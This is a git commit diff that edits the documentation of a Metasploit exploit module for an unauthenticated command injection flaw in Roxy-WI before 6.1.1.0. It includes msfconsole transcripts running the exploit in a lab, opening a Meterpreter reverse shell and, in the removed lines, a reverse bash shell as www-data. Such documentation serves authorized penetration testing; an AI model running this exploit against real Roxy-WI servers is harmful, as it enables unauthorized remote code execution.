Apply suggestions from code review

2022-07-25 16:03:09 +00:00
parent bc0b27e1e2
commit bdf8defe53
1 changed files with 27 additions and 43 deletions
@@ -1,11 +1,8 @@
 ## Vulnerable Application

-### Description
-
 This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0.
 Successful exploitation results in remote code execution under the context of the web server user.

-
 ### Setup

 Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
@@ -30,62 +27,49 @@ chown -R www-data:www-data haproxy-wi
 9. Do: `run`
 10. You should get a shell as the user running the Roxy-WI server.

+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
 ## Options

 ### TARGETURI
-The base path to Roxy-WI. The default value is `/`
+
+Set `TARGETURI` if the Roxy-WI is installed at a custom path.

 ## Scenarios

+### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64)
+
 ```
-msf6 > use exploit/linux/http/roxy_wi_exec 
+Apache/2.4.52 
+MySQL 8.0.29
+Python 3.10.4
+```
+
+```
+msf6 > use exploit/linux/http/roxy_wi_exec
 [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
 msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
 RHOST => 192.168.56.116
-msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
-RPORT => 443
 msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
 LHOST => 192.168.56.1
+msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
+RPORT => 443
 msf6 exploit(linux/http/roxy_wi_exec) > run

 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Checking if 192.168.56.116:443 is vulnerable!
 [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
-[*] Generating payload.
-[*] Trying to detect command injection vulnerability.
-[*] Sending stage (40164 bytes) to 192.168.56.116
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300
-[+] Exploit successfully executed.
+[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp
+[*] Sending stage (40168 bytes) to 192.168.56.116
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300

-meterpreter > pwd
-/var/www/haproxy-wi/app
-```
-
-You can also use cmd payloads.
-
-```
-msf6 > use exploit/linux/http/roxy_wi_exec 
-[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
-msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
-RHOST => 192.168.56.116
-msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
-RPORT => 443
-msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
-LHOST => 192.168.56.1
-msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
-payload => cmd/unix/reverse_bash
-msf6 exploit(linux/http/roxy_wi_exec) > run
-
-[*] Started reverse TCP handler on 192.168.56.1:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] Checking if 192.168.56.116:443 is vulnerable!
-[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
-[*] Generating payload.
-[*] Trying to detect command injection vulnerability.
-[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
-[+] Exploit successfully executed.
-
-id
-uid=33(www-data) gid=33(www-data) groups=33(www-data)```
+meterpreter > 
 ```